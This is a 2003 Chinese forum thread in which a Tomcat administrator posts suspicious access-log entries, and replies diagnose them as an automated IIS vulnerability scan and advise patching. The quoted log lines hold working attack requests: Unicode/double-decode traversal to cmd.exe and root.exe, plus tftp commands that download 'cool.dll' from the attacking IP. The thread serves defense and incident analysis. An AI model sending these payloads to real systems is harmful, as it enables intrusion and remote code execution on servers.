我的网站是否被攻击成功了?

我的web服务器是tomcat 4.1.8(win2000 pack3)今天在log 文件里发现了如下纪录，
哪位能不能帮我看看是否被攻击成功了。如果时，那他是用什么漏洞进行攻击的呢？难道tomcat 也有类似iss unicode的
漏洞，为了防范此漏洞需要做那些设置呢？（我已经修改了密码）。
还望赐教！先谢了！
218.5.3.98 - - [29/Jul/2003:19:52:31 8000] “GET /scripts/root.exe?/c+dir HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:31 8000] “GET /scripts/root.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:31 8000] “GET /scripts/httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:31 8000] “GET /MSADC/root.exe?/c+dir HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:31 8000] “GET /MSADC/root.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:31 8000] “GET /MSADC/httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:31 8000] “GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:31 8000] “GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:32 8000] “GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:32 8000] “GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:32 8000] “GET /c/httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:32 8000] “GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:32 8000] “GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:32 8000] “GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:32 8000] “GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:32 8000] “GET /d/httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:33 8000] “GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:33 8000] “GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:33 8000] “GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:33 8000] “GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:33 8000] “GET /scripts/..%255c../httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:33 8000] “GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:33 8000] “GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:33 8000] “GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:34 8000] “GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:34 8000] “GET /_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:34 8000] “GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 200 -
218.5.3.98 - - [29/Jul/2003:19:52:34 8000] “GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20218.5.3.98%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0“ 200 -
218.5.3.98 - -
---------------------------------------------------------------

装sp4，打IIS补丁，装杀毒软件
---------------------------------------------------------------

以下个人分析仅供参考：

按照时间发生时间29/Jul/2003:19:52:31 到29/Jul/2003:19:52:35仅几秒钟，以及同一IP 218.5.3.98 来看，你是被人利用漏洞扫描器扫描，可能由于对方看到你的系统为windows系统，故按照默认的iis系列漏洞扫描，因此，单凭这几点来看，你的系统没有被攻破而是被扫描过，这是攻击前准备。

你修改密码是非常明智的选择。不过针对tomcat服务器好像也有不少漏洞（如JSP源代码泄露问题），也请注意为妙。
---------------------------------------------------------------

tomcat 没用过,不知道有没有类似unicode的漏洞,不过看来他认为有,并且试图上传文件获得更高的权限,看来他没有成功,呵呵,你可以到scripts目录下面看看有没有他上传的文件?
还有楼主的ip也是218.5.3.*的?
---------------------------------------------------------------

rdpwd.sys
ntkrnlmp.exe
ntkrpamp.exe
不清楚，其他的在我机器上都有，系统应该是正常的。
又生成了另一个cmd.exe这个现象很普遍，不过我也说不出什么原因来，以前怀疑是入侵者通过某种方式上传的，使用了很多检测手段，甚至专门构建了一台蜜罐主机，但是一直找不到明显迹象。
不知道能有哪位指点一二。
---------------------------------------------------------------

呵呵,system32下面得cmd没必要改,它是系统文件,微软对这些文件都进行了保护,在\WINNT\SYSTEM32\DLLCACHE下面你会发现也有类似得保护文件,当你在system32下面删除时,系统自动从\WINNT\SYSTEM32\DLLCACHE这个缓存里面copy过来,所以你删除不了,这没什么,是正常得文件
对方只不过利用了漏洞调用了你的cmd,试图执行命令而已,有问题也是漏洞得问题,不是cmd得问题.
默认得iis执行目录在inetpub\scripts\下面,对方可能要上传一个dll文件获得管理员权限,你找找他上传成功了没有?
他用tftp上传,如果他没有用错得话,说明他和你在同一个局域网里面,你可以查查他得ip是那个机器,直接找他,呵呵